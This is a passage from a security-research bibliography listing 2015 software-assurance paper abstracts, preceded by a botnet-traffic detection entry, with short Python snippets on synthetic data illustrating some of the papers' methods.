Abstract: Botnets represent one of the most serious threats to the Internet security today. This paper explores how network traffic classification can be used for accurate and efficient identification of botnet network activity at local and enterprise networks. The paper examines the effectiveness of detecting botnet network traffic using three methods that target protocols widely considered as the main carriers of botnet Command and Control (C&C) and attack traffic, i.e. TCP, UDP and DNS. We propose three traffic classification methods based on capable Random Forests classifier. The proposed methods have been evaluated through the series of experiments using traffic traces originating from 40 different bot samples and diverse non-malicious applications. The evaluation indicates accurate and time-efficient classification of botnet traffic for all three protocols. The future work will be devoted to the optimization of traffic analysis and the correlation of findings from the three analysis methods in order to identify compromised hosts within the network.

keywords: Internet;computer network security;invasive software;learning (artificial intelligence);pattern classification;telecommunication traffic;Internet security threats;attack traffic;botnet C&C;botnet command and control;botnet detection;botnet network activity;botnet network traffic detection;enterprise networks;local networks;network traffic classification analysis;nonmalicious applications;random forest classifier;traffic analysis optimization;Feature extraction;IP networks;Malware;Monitoring;Ports (Computers);Protocols;Botnet;Botnet Detection;Features Selection;MLAs;Random Forests;Traffic Analysis;Traffic Classification (ID#: 16-9301)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7361120&isnumber=7166109
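
The Random Forests classification step can be illustrated with per-flow features; the feature set and synthetic flows below are hypothetical stand-ins for the TCP/UDP/DNS traffic traces the authors analysed.

import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score

rng = np.random.default_rng(3)
n = 1000

# Hypothetical per-flow features: duration, bytes out, bytes in,
# packet count, mean inter-arrival time.
benign = rng.normal(loc=[5, 4e4, 3e4, 50, 0.2],
                    scale=[2, 1e4, 8e3, 15, 0.05], size=(n, 5))
botnet = rng.normal(loc=[60, 2e3, 1e3, 400, 1.5],
                    scale=[20, 5e2, 3e2, 90, 0.4], size=(n, 5))
X = np.vstack([benign, botnet])
y = np.array([0] * n + [1] * n)  # 1 = botnet C&C traffic

clf = RandomForestClassifier(n_estimators=100, random_state=3)
print("cross-validated accuracy:", cross_val_score(clf, X, y, cv=5).mean())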


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Software Assurance 2015

 

 
SoS Logo

Software Assurance 2015

 

Software assurance is an essential element in the development of scalable and composable systems. For a complete system to be secure, each subassembly must be secure, and that security must be measurable. The research work cited here looks at software assurance metrics and was presented in 2015.


D. Kumar and M. Kumari, "Component Based Software Engineering: Quality Assurance Models, Metrics," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6, 2015. doi: 10.1109/ICRITO.2015.7359358

Abstract: Component-based software engineering is a newer trend in software development. The fundamental idea is to reuse already-completed components rather than developing everything from scratch each time. Component-based development brings numerous advantages: faster development, lower development costs, better usability, and so on. Component-based development is, however, still not a mature process, and many issues remain. For instance, when you purchase a component you do not know its behavior precisely, and you have no control over its maintenance. To be able to effectively create component-based products, organizations must introduce new development methods. We highlight quality assurance for component-based software. Through this paper we propose a QAM of CBM that covers CRA, CD, certification, customization, and SAD, SI, ST, and SM.

Keywords: object-oriented programming; quality assurance; software engineering; software metrics; CBM; CD; CRA; QAM; SAD; SM; ST; SI; certification; component based improvement; component based software engineering; quality assurance models; software advancement; software metrics; Quadrature amplitude modulation; Reliability; Component based software engineering; Metrics; Quality Assurance Characteristics; Quality Assurance Models; life cycle (ID#: 16-9409)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359358&isnumber=7359191

 

C. Woody, R. Ellison and W. Nichols, "Predicting Cybersecurity Using Quality Data," Technologies for Homeland Security (HST), 2015 IEEE International Symposium on, Waltham, MA, 2015, pp. 1-5, 2015. doi: 10.1109/THS.2015.7225327

Abstract: Within the process of system development and implementation, programs assemble hundreds of different metrics for tracking and monitoring software such as budgets, costs and schedules, contracts, and compliance reports. Each contributes, directly or indirectly, toward the cybersecurity assurance of the results. The Software Engineering Institute has detailed size, defect, and process data on over 100 software development projects. The projects include a wide range of application domains. Data from five projects identified as successful safety-critical or security-critical implementations were selected for cybersecurity consideration. Material was analyzed to identify a possible correlation between modeling quality and security and to identify potential predictive cybersecurity modeling characteristics. While not a statistically significant sample, this data indicates the potential for establishing benchmarks for ranges of quality performance (for example, defect injection rates and removal rates and test yields) that provide a predictive capability for cybersecurity results.

Keywords: safety-critical software; security of data ;software quality; system monitoring; Software Engineering Institute; cybersecurity assurance; cybersecurity consideration; predictive capability; predictive cybersecurity modeling characteristics; programs assemble; quality data; quality performance; safety-critical implementation; security-critical implementation; software development project; software monitoring; software tracking; system development; Contracts; Safety; Schedules; Software; Software measurement; Testing; Topology; engineering security; quality modeling; security predictions; software assurance (ID#: 16-9410)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7225327&isnumber=7190491

 

A. Delaitre, B. Stivalet, E. Fong and V. Okun, "Evaluating Bug Finders -- Test and Measurement of Static Code Analyzers," Complex Faults and Failures in Large Software Systems (COUFLESS), 2015 IEEE/ACM 1st International Workshop on, Florence, 2015, pp. 14-20, 2015. doi: 10.1109/COUFLESS.2015.10

Abstract: Software static analysis is one of many options for finding bugs in software. Like compilers, static analyzers take a program as input. This paper covers tools that examine source code - without executing it - and output bug reports. Static analysis is a complex and generally undecidable problem. Most tools resort to approximation to overcome these obstacles and it sometimes leads to incorrect results. Therefore, tool effectiveness needs to be evaluated. Several characteristics of the tools should be examined. First, what types of bugs can they find? Second, what proportion of bugs do they report? Third, what percentage of findings is correct? These questions can be answered by one or more metrics. But to calculate these, we need test cases having certain characteristics: statistical significance, ground truth, and relevance. Test cases with all three attributes are out of reach, but we can use combinations of only two to calculate the metrics. The results in this paper were collected during Static Analysis Tool Exposition (SATE) V, where participants ran 14 static analyzers on the test sets we provided and submitted their reports to us for analysis. Tools had considerably different support for most bug classes. Some tools discovered significantly more bugs than others or generated mostly accurate warnings, while others reported wrong findings more frequently. Using the metrics, an evaluator can compare candidates and select the tool that aligns best with his or her objectives. In addition, our results confirm that the bugs most commonly found by tools are among the most common and important bugs in software. We also observed that code complexity is a major hindrance for static analyzers and detailed which code constructs tools handle well and which impede their analysis.

Keywords: program debugging; program diagnostics; program testing; SATE V; bug finder evaluation; code complexity; ground truth; software static analysis; static analysis tool exposition V; static code analyzer measurement; static code analyzer testing; statistical significance; Complexity theory; Computer bugs; Java; Measurement; NIST; Production; Software; software assurance; software faults; software vulnerability; static analysis tools (ID#: 16-9411)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7181477&isnumber=7181467

 

C. Tantithamthavorn, S. McIntosh, A. E. Hassan, A. Ihara and K. Matsumoto, "The Impact of Mislabelling on the Performance and Interpretation of Defect Prediction Models," Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE International Conference on, Florence, 2015, pp. 812-823, 2015.

 doi: 10.1109/ICSE.2015.93

Abstract: The reliability of a prediction model depends on the quality of the data from which it was trained. Therefore, defect prediction models may be unreliable if they are trained using noisy data. Recent research suggests that randomly-injected noise that changes the classification (label) of software modules from defective to clean (and vice versa) can impact the performance of defect models. Yet, in reality, incorrectly labelled (i.e., mislabelled) issue reports are likely non-random. In this paper, we study whether mislabelling is random, and the impact that realistic mislabelling has on the performance and interpretation of defect models. Through a case study of 3,931 manually-curated issue reports from the Apache Jackrabbit and Lucene systems, we find that: (1) issue report mislabelling is not random; (2) precision is rarely impacted by mislabelled issue reports, suggesting that practitioners can rely on the accuracy of modules labelled as defective by models that are trained using noisy data; (3) however, models trained on noisy data typically achieve 56%-68% of the recall of models trained on clean data; and (4) only the metrics in top influence rank of our defect models are robust to the noise introduced by mislabelling, suggesting that the less influential metrics of models that are trained on noisy data should not be interpreted or used to make decisions.

Keywords: software performance evaluation; software reliability; Apache Jackrabbit system; Lucene system; defect prediction model interpretation; defect prediction model performance; defect prediction models; mislabelling impact; prediction model reliability; randomly-injected noise; software modules; Data mining; Data models; Noise; Noise measurement; Predictive models; Software; Data Quality; Mislabelling; Software Defect Prediction; Software Quality Assurance (ID#: 16-9412)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7194628&isnumber=7194545
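
The random-noise baseline that this paper contrasts against can be reproduced in a few lines: flip a fraction of training labels, retrain, and observe how precision and recall respond. The sketch below uses synthetic data and a random forest; note that the paper's central finding is that realistic mislabelling is non-random, which this simple sketch deliberately does not model.

import numpy as np
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=4000, n_features=20, weights=[0.8, 0.2], random_state=5)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=5)
rng = np.random.default_rng(5)

def flip_labels(labels, rate):
    # Emulate mislabelled issue reports by flipping a random fraction.
    noisy = labels.copy()
    idx = rng.choice(len(noisy), size=int(rate * len(noisy)), replace=False)
    noisy[idx] = 1 - noisy[idx]
    return noisy

for rate in (0.0, 0.1, 0.3):
    clf = RandomForestClassifier(random_state=5).fit(X_tr, flip_labels(y_tr, rate))
    pred = clf.predict(X_te)
    print(f"noise {rate:.0%}: precision {precision_score(y_te, pred):.2f}, "
          f"recall {recall_score(y_te, pred):.2f}")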

 

Sun-Jan Huang, Wen-Chuan Chen and Ping-Yao Chiu, "Evaluation Process Model of the Software Product Quality Levels," Industrial Informatics - Computing Technology, Intelligent Technology, Industrial Information Integration (ICIICII), 2015 International Conference on, Wuhan, 2015, pp. 55-58, 2015. doi: 10.1109/ICIICII.2015.101

Abstract: Nowadays, the software industry is still facing many problems in controlling and evaluating software product quality. One of the primary reasons is that, besides lacking an objective software product quality assessment model, software organizations do not have a well-defined mechanism for measuring quality attributes and further evaluating the level of software product quality. This paper proposes a process model for evaluating the level of software product quality, based on the International Standard ISO/IEC 14598 - Software Product Evaluation. The proposed process model can generate a tailored software product quality evaluation model based on the type of information system. Accordingly, the required software measures are collected and further analyzed to provide feedback for improving software product quality. The model can help software development organizations establish their own evaluation models of the software product quality level and thus serve as an agreement on software product quality requirements.

Keywords: quality control; software development management; software metrics; software quality; software standards; International Standard ISO/IEC 14598;evaluation process model; information system; objective software product quality assessment model; quality attribute measurement; quality control; quality evaluation; software development; software industry; software product quality level; IEC Standards; ISO Standards; Measurement; Organizations; Product design; Quality assessment; Software; Measurement and Analysis; Software Product Quality Level; Software Quality Assurance (ID#: 16-9413)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373789&isnumber=7373746

 

Luyi Li, Minyan Lu and Tingyang Gu, "Constructing Runtime Models of Complex Software-Intensive Systems for Analysis of Failure Mechanism," Reliability Systems Engineering (ICRSE), 2015 First International Conference on, Beijing, 2015, pp. 1-10, 2015. doi: 10.1109/ICRSE.2015.7366482

Abstract: With the growing complexity of complex software-intensive systems, new features emerge such as logical complexity, boundary erosion and failure normalization, which bring new challenges for software dependability assurance. As a result, there is an urgent need to analyze the failure mechanism of these systems in order to ensure their dependability. Research indicates that, because of these emerging features, the failure mechanism of complex software-intensive systems is related closely to the system's runtime states and behaviors. But direct analysis of the failure mechanism on actual complex software-intensive systems is costly and nearly impossible because of their large scale, so failure mechanism analysis is normally performed on abstract models of real systems. However, current modelling methods are insufficient for comprehensively describing a system's internal interactions, software/hardware interaction behavior, and runtime behavior, so a new modelling method is needed to support the description of these new features. This paper proposes a method for constructing runtime models of complex software-intensive systems which takes into consideration internal interaction behavior, interaction behavior between software and hardware on the system boundary, as well as dynamic runtime behavior. The proposed method includes a static structure model to describe the static structural properties of the system, a software/hardware interaction model to describe the interaction characteristics between hardware and software on the system boundary, and a dynamic runtime behavior model to formally describe the dynamic features of runtime behavior. An example is provided to demonstrate how to use the proposed method, and its implications for failure mechanism analysis in complex software-intensive systems are discussed.

Keywords: program diagnostics; software metrics software reliability; system recovery; abstract model; boundary erosion; complex software-intensive system; dynamic runtime behavior model; failure mechanism analysis; failure normalization; internal interaction behavior; logical complexity; runtime model; software dependability assurance; software-hardware interaction behavior; software-hardware interaction model; static structure model; system boundary; system internal interaction; system runtime behavior; system runtime state; Analytical models; Failure analysis; Object oriented modeling; Runtime; Software; Unified modeling language; dynamic runtime behavior; failure mechanism; interaction between software and hardware; runtime model; static structure (ID#: 16-9414)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7366482&isnumber=7366393

 

R. E. Garcia, R. C. Messias Correia, C. Olivete, A. Costacurta Brandi and J. Marques Prates, "Teaching and Learning Software Project Management: A Hands-on Approach," Frontiers in Education Conference (FIE), 2015 IEEE, El Paso, TX, 2015, pp. 1-7, 2015. doi: 10.1109/FIE.2015.7344412

Abstract: Project management is an essential activity across several areas, including Software Engineering. Through good management it is possible to meet deadlines and budget goals, and mainly to deliver a product that meets customer expectations. Project management activity encompasses: measurement and metrics; estimation; risk analysis; schedules; tracking and control. Considering the importance of managing projects, it is necessary that courses related to Information Technology and Computer Science present to students the concepts, techniques and methodology necessary to cover all project management activities. Software project management courses aim at preparing students to apply management techniques required to plan, organize, monitor and control software projects. In a nutshell, software project management focuses on process, problem and people. In this paper we propose an approach to the teaching and learning of software project management using practical activities. The intention of this work is to provide the experience of applying theoretical concepts in practical activities. The teaching and learning approach, applied since 2006 in a Computer Science course, is based on teamwork. Each team is divided into groups assuming different roles of software process development. We have set four groups, each one assuming a different role (manager; software quality assurance; analyst and designer; programmer). The team must be guided across the software process by its manager. We use four projects; each group is in charge of managing a different project. In this paper we present the proposed approach (based on hands-on activities for project management); we summarize the lessons learned from applying the approach since 2006; and we present a qualitative analysis of data collected during its application.

Keywords: computer science education; educational courses; project management; risk analysis; scheduling; software management; software metrics; teaching; team working; analyst; computer science course; control; designer; estimation; hands-on approach; information technology; learning software project management course; manager; measurement; metrics; programmer; qualitative analysis; risk analysis; schedule; software engineering; software process development; software quality assurance; teaching; teamwork; tracking; Education; Monitoring; Project management; Schedules; Software; Software engineering; Learning Project Management; Practical Activities; Teaching Methodology; Teamwork (ID#: 16-9415)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7344412&isnumber=7344011

 

C. J. Hwang, A. Kush and Ruchika, "Performance Evaluation of MANET Using Quality of Service Metrics," Innovative Computing Technology (INTECH), 2015 Fifth International Conference on, Galcia, 2015, pp. 130-135, 2015. doi: 10.1109/INTECH.2015.7173483

Abstract: An ad hoc network is a collection of mobile nodes dynamically forming a temporary network without the use of any existing network infrastructure or centralized administration. Several routing protocols have been proposed for ad hoc networks, prominent among them Ad hoc On Demand Distance Vector Routing (AODV) and Dynamic Source Routing (DSR). Effort has been made to apply software quality assurance parameters to ad hoc networks to achieve the desired results. This paper analyses the performance of the AODV and DSR routing protocols with respect to quality assurance metrics. The performance differentials of the AODV and DSR protocols are analyzed using the NS-2 simulator and compared in terms of the quality assurance metrics applied.

Keywords: mobile ad hoc networks; quality assurance; quality of service; routing protocols; software quality; AODV routing protocols; DSR routing protocols; MANET performance evaluation; NS-2 simulator; ad hoc on demand distance vector routing; dynamic source routing; mobile ad hoc network; mobile node collection; network infrastructure; quality of service metrics; software quality assurance parameter; temporary network; Mobile ad hoc networks; Reliability; Routing; Routing protocols; Usability; AODV; DSR; MANET; NS2; PDR; SQA (ID#: 16-9416)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7173483&isnumber=7173359

 

T. Bin Noor and H. Hemmati, "A Similarity-Based Approach for Test Case Prioritization Using Historical Failure Data," Software Reliability Engineering (ISSRE), 2015 IEEE 26th International Symposium on, Gaithersburg, MD, 2015, pp. 58-68. doi: 10.1109/ISSRE.2015.7381799

Abstract: Test case prioritization is a crucial element of software quality assurance in practice, especially in the context of regression testing. Typically, test cases are prioritized in a way that they detect potential faults earlier. The effectiveness of test cases, in terms of fault detection, is estimated using quality metrics, such as code coverage, size, and historical fault detection. Prior studies have shown that previously failing test cases are highly likely to fail again in the next releases; therefore, they are ranked highly while prioritizing. However, in practice, a failing test case may not be exactly the same as a previously failed test case, but quite similar, e.g., when the new failing test is a slightly modified version of an old failing one to catch an undetected fault. In this paper, we define a class of metrics that estimate test case quality using similarity to previously failing test cases. We have conducted several experiments with five real-world open source software systems, with real faults, to evaluate the effectiveness of these quality metrics. The results of our study show that our proposed similarity-based quality measure is significantly more effective for prioritizing test cases compared to existing test case quality measures.

Keywords: fault diagnosis; program testing; public domain software; quality assurance; regression analysis; software metrics; software quality; statistical testing; code coverage; code size; historical failure data; historical fault detection; open source software systems; regression testing; similarity-based quality measure; software quality assurance; software quality metrics; test case prioritization; Context; Fault detection; History; Measurement; Software quality; Testing; Code coverage; Distance function; Execution trace; Historical data; Similarity; Test case prioritization; Test quality metric; Test size (ID#: 16-9417)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381799&isnumber=7381793
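
One plausible instantiation of such a similarity-based metric — the paper defines a whole class of them — is Jaccard similarity between a test's execution trace and the traces of previously failing tests, sketched below with invented trace data.

# Hypothetical execution traces: sets of covered methods per test.
tests = {
    "t1": {"parse", "validate", "save"},
    "t2": {"render", "layout"},
    "t3": {"parse", "validate", "encrypt"},
}
# Traces of tests that failed in previous releases.
historical_failures = [{"parse", "validate", "sign"}]

def jaccard(a, b):
    # Jaccard similarity between two sets of covered code elements.
    return len(a & b) / len(a | b) if a | b else 0.0

def priority(trace):
    # Score a test by its maximum similarity to any past failing test.
    return max(jaccard(trace, f) for f in historical_failures)

ranked = sorted(tests, key=lambda t: priority(tests[t]), reverse=True)
print(ranked)  # tests most similar to past failures run first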

 

H. Sharma and A. Chug, "Dynamic Metrics Are Superior Than Static Metrics in Maintainability Prediction: An Empirical Case Study," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6. doi: 10.1109/ICRITO.2015.7359354

Abstract: Software metrics help us make meaningful estimates for software products and guide us in taking managerial and technical decisions such as budget planning, cost estimation, quality assurance testing, software debugging, software performance optimization, and optimal personnel task assignments. Many design metrics have been proposed in the literature to measure various constructs of the Object Oriented (OO) paradigm, such as class, coupling, cohesion, inheritance, information hiding and polymorphism, and to use them further in determining various aspects of software quality. However, the use of conventional static metrics has been found inadequate for modern OO software due to the presence of run-time polymorphism, template classes, template methods, dynamic binding, and code left unexecuted under specific input conditions. This gap gave a cue to focus on the use of dynamic metrics instead of traditional static metrics to capture software characteristics and further deploy them for maintainability predictions. As dynamic metrics are more precise in capturing the execution behavior of the software system, in the current empirical investigation with the use of open source code, we validate and verify the superiority of dynamic metrics over static metrics. Four machine learning models are used for making the prediction model, while training is performed simultaneously using the static as well as the dynamic metric suite. The results are analyzed using prevalent prediction accuracy measures, which indicate that the predictive capability of dynamic metrics is more precise than that of static metrics irrespective of the machine learning prediction model. These results would be helpful to practitioners, as they can use dynamic metrics in maintainability prediction to achieve precise planning of resource allocation.

Keywords: learning (artificial intelligence); object-oriented methods; public domain software; resource allocation; software maintenance; software metrics; software quality; OO software; design metrics; dynamic binding; dynamic metrics; machine learning prediction model; maintainability prediction; object oriented paradigm; open source code; prevalent prediction accuracy; resource allocation; run time polymorphism; software characteristics; software metrics; software product estimation; software quality; static metrics; template class; template methods; Dynamic metrics; Machine learning; Software maintainability prediction; Software quality; Static metrics (ID#: 16-9418)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359354&isnumber=7359191
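
The experimental design — train the same learner once on a static metric suite and once on a dynamic suite, then compare prediction accuracy — looks roughly like the sketch below. The data here is synthetic and deliberately constructed so the dynamic suite carries more signal, mirroring (not reproducing) the paper's conclusion.

import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import cross_val_score

rng = np.random.default_rng(9)
n = 300

# Hypothetical per-class measurements. Static suite: e.g. WMC, CBO, LCOM.
static_suite = rng.normal(size=(n, 3))
# Dynamic suite: e.g. runtime coupling and method-execution counts.
dynamic_suite = rng.normal(size=(n, 3))
# Simulated maintenance effort, driven mostly by the dynamic metrics.
effort = 2.0 * dynamic_suite[:, 0] + 0.5 * static_suite[:, 0] + rng.normal(scale=0.5, size=n)

for name, X in (("static", static_suite), ("dynamic", dynamic_suite)):
    r2 = cross_val_score(RandomForestRegressor(random_state=9), X, effort,
                         cv=5, scoring="r2").mean()
    print(f"{name} suite: mean R^2 {r2:.2f}")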

 

T. Cseri, "Examining Structural Correctness of Documentation Comments in C++ Programs," Scientific Conference on Informatics, 2015 IEEE 13th International, Poprad, 2015, pp. 79-84. doi: 10.1109/Informatics.2015.7377812

Abstract: Tools guaranteeing the correctness of software focus almost exclusively on the syntax and the semantics of programming languages. Compilers, static analysis tools, etc. generate diagnostic messages on inconsistencies of the language elements. However, source code contains other important artifacts: comments, which are highly important to document, understand and therefore maintain the software. It is a common experience that the quality of comments erodes during the lifecycle of the software. In this paper we investigate the quality of the documentation comments, which follow a predefined strict syntax, because they are written to be processed using an external documentation generator tool. We categorize the inconsistencies identified by Doxygen - the most widespread documentation tool for C++. We define a metric to represent the quality of the comments and we investigate how this metric changes during the lifetime of a project. The aim of the research is to provide quality assurance for the non-language components of the software.

Keywords: C++ language; computational linguistics; software metrics; software quality; system documentation; C++ programs; Doxygen; comments quality metric; documentation comments quality; documentation comments structural correctness; external documentation generator tool; quality assurance; software nonlanguage components; syntax; Documentation; Generators; HTML; Semantics; Software; Syntactics (ID#: 16-9419)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7377812&isnumber=7377797

 

N. Ohsugi et al., "Using Trac for Empirical Data Collection and Analysis in Developing Small and Medium-Sized Enterprise Systems," Empirical Software Engineering and Measurement (ESEM), 2015 ACM/IEEE International Symposium on, Beijing, 2015, pp. 1-9. doi: 10.1109/ESEM.2015.7321217

Abstract: This paper describes practical case studies of using Trac as a platform for collecting empirical data in the development of small and medium-sized enterprise systems. Project managers have been using various empirical data such as size, development effort and the number of bugs found. These data are vital for management, although the cost of preparing an effective combination of measurement tools, procedures and continuous monitoring to collect reliable data is not small, and many small and medium-sized projects are constrained by budget limitations. This paper describes practical examples of low-cost data collection in the development of two enterprise systems. The examples consist of a small project (5 development personnel at the peak period, down to 3 during maintenance) and a medium-sized project (80 personnel at the peak, down to 28), used to develop two different enterprise systems. Over 29 months, ten basic metrics and seven derived metrics were collected regarding effort, size and quality, and were used for progress management, estimation, and quality assurance.

Keywords: data analysis; small-to-medium enterprises; Trac; data analysis; empirical data collection; progress management; small and medium-sized enterprise systems; Data collection; Estimation; Maintenance engineering; Measurement; Monitoring; Personnel; Reliability (ID#: 16-9420)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7321217&isnumber=7321177

 

R. Yanggratoke et al., "Predicting Real-Time Service-Level Metrics From Device Statistics," Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, Ottawa, ON, 2015, pp. 414-422. doi: 10.1109/INM.2015.7140318

Abstract: While real-time service assurance is critical for emerging telecom cloud services, understanding and predicting performance metrics for such services is hard. In this paper, we pursue an approach based upon statistical learning whereby the behavior of the target system is learned from observations. We use methods that learn from device statistics and predict metrics for services running on these devices. Specifically, we collect statistics from a Linux kernel of a server machine and predict client-side metrics for a video-streaming service (VLC). The fact that we collect thousands of kernel variables, while omitting service instrumentation, makes our approach service-independent and unique. While our current lab configuration is simple, our results, gained through extensive experimentation, prove the feasibility of accurately predicting client-side metrics, such as video frame rates and RTP packet rates, often within 10-15% error (NMAE), also under high computational load and across traces from different scenarios.

Keywords: Linux; cloud computing; operating system kernels; software performance evaluation; video streaming; Linux kernel; VLC; client-side metrics prediction; device statistics; performance metrics; real-time service assurance; real-time service-level metrics prediction; server machine; service instrumentation; statistical learning; telecom cloud services; video-streaming service; Computational modeling; Generators; Load modeling; Measurement; Predictive models; Servers; Streaming media; Quality of service; cloud computing; machine learning; network analytics; statistical learning; video streaming (ID#: 16-9421)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140318&isnumber=7140257
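
The paper's accuracy figures are quoted as NMAE (Normalized Mean Absolute Error). A minimal sketch of the learning setup — regress a client-side metric on device statistics, then compute NMAE — follows; the synthetic features, the random-forest learner, and the particular NMAE normalization (MAE divided by the mean observed value, one common definition) are assumptions, not details from the paper.

import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(11)

# Synthetic stand-in for kernel statistics (CPU, memory, I/O counters)
# and a client-side metric such as video frame rate.
X = rng.normal(size=(2000, 12))
frame_rate = 25 + 3 * X[:, 0] - 2 * X[:, 3] + rng.normal(scale=1.0, size=2000)

X_tr, X_te, y_tr, y_te = train_test_split(X, frame_rate, test_size=0.3, random_state=11)
model = RandomForestRegressor(random_state=11).fit(X_tr, y_tr)
pred = model.predict(X_te)

nmae = np.mean(np.abs(y_te - pred)) / np.mean(y_te)
print(f"NMAE: {nmae:.1%}")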

 

W. C. Barott, T. Dabrowski and B. Himed, "Fidelity and Complexity in Passive Radar Simulations," High Assurance Systems Engineering (HASE), 2015 IEEE 16th International Symposium on, Daytona Beach Shores, FL, 2015, pp. 277-278. doi: 10.1109/HASE.2015.30

Abstract: A case study of the trade off between fidelity and complexity is presented for a passive radar simulator. Although it is possible to accurately model the underlying physics, signal processing, and environment of a radar, the resulting model might be both too complex and too costly to evaluate. Instead, simplifications of various model attributes reduce the complexity and permit fast evaluation of performance metrics over large areas, such as the United States. Several model simplifications and their impact on the results are discussed.

Keywords: digital simulation; passive radar; radar computing; United States; complexity; complexity reduction; fidelity; passive radar simulations; radar environment; signal processing; Accuracy; Atmospheric modeling; Computational modeling; Passive radar; Predictive models; modeling; passive radar; simulation (ID#: 16-9422)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7027444&isnumber=7027398

 

E. Takamura, K. Mangum, F. Wasiak and C. Gomez-Rosa, "Information Security Considerations for Protecting NASA Mission Operations Centers (MOCs)," Aerospace Conference, 2015 IEEE, Big Sky, MT, 2015, pp. 1-14. doi: 10.1109/AERO.2015.7119207

Abstract: In NASA space flight missions, the Mission Operations Center (MOC) is often considered “the center of the (ground segment) universe,” at least by those involved with ground system operations. It is at and through the MOC that spacecraft is commanded and controlled, and science data acquired. This critical element of the ground system must be protected to ensure the confidentiality, integrity and availability of the information and information systems supporting mission operations. This paper identifies and highlights key information security aspects affecting MOCs that should be taken into consideration when reviewing and/or implementing protecting measures in and around MOCs. It stresses the need for compliance with information security regulation and mandates, and the need for the reduction of IT security risks that can potentially have a negative impact to the mission if not addressed. This compilation of key security aspects was derived from numerous observations, findings, and issues discovered by IT security audits the authors have conducted on NASA mission operations centers in the past few years. It is not a recipe on how to secure MOCs, but rather an insight into key areas that must be secured to strengthen the MOC, and enable mission assurance. Most concepts and recommendations in the paper can be applied to non-NASA organizations as well. Finally, the paper emphasizes the importance of integrating information security into the MOC development life cycle as configuration, risk and other management processes are tailored to support the delicate environment in which mission operations take place.

Keywords: aerospace computing; command and control systems; data integrity; information systems; risk management; security of data; space vehicles; IT security audits; IT security risk reduction; MOC development life cycle; NASA MOC protection; NASA mission operation center protection; NASA space flight missions; ground system operations; information availability; information confidentiality; information integrity; information security considerations; information security regulation; information systems; nonNASA organizations; spacecraft command and control; Access control; Information security; Monitoring; NASA; Software; IT security metrics; NASA; access control; asset protection; automation; change control; connection protection; continuous diagnostics and mitigation; continuous monitoring; ground segment ground system; incident handling; information assurance; information security; information security leadership; information technology leadership; infrastructure protection; least privilege; logical security; mission assurance; mission operations; mission operations center; network security; personnel screening; physical security; policies and procedures; risk management; scheduling restrictions; security controls; security hardening; software updates; system cloning and software licenses; system security; system security life cycle; unauthorized change detection; unauthorized change deterrence; unauthorized change prevention (ID#: 16-9423)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7119207&isnumber=7118873

 

J. Di Rocco, D. Di Ruscio, L. Iovino and A. Pierantonio, "Mining Correlations of ATL Model Transformation and Metamodel Metrics," Modeling in Software Engineering (MiSE), 2015 IEEE/ACM 7th International Workshop on, Florence, 2015, pp. 54-59. doi: 10.1109/MiSE.2015.17

Abstract: Model transformations are considered to be the "heart" and "soul" of Model Driven Engineering, and as such, advanced techniques and tools are needed for supporting the development, quality assurance, maintenance, and evolution of model transformations. Even though model transformation developers have access to powerful languages and tools for developing and testing model transformations, very few techniques are available to support the understanding of transformation characteristics. In this paper, we propose a process to analyze model transformations with the aim of identifying to what extent their characteristics depend on the corresponding input and target metamodels. The process relies on a number of transformation and metamodel metrics that are calculated and properly correlated. The paper discusses the application of the approach on a corpus consisting of more than 90 ATL transformations and 70 corresponding metamodels.

Keywords: program diagnostics; software metrics; ATL model transformation; correlation modeling; metamodel metrics; model driven engineering; Analytical models; Complexity theory; Correlation; IP networks; Indexes; Measurement; Object oriented modeling (ID#: 16-9424)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167403&isnumber=7167386

 

Y. S. Olaperi and S. Misra, "An Empirical Evaluation of Software Quality Assurance Practices and Challenges in a Developing Country," Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, Liverpool, 2015, pp. 867-871. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.129

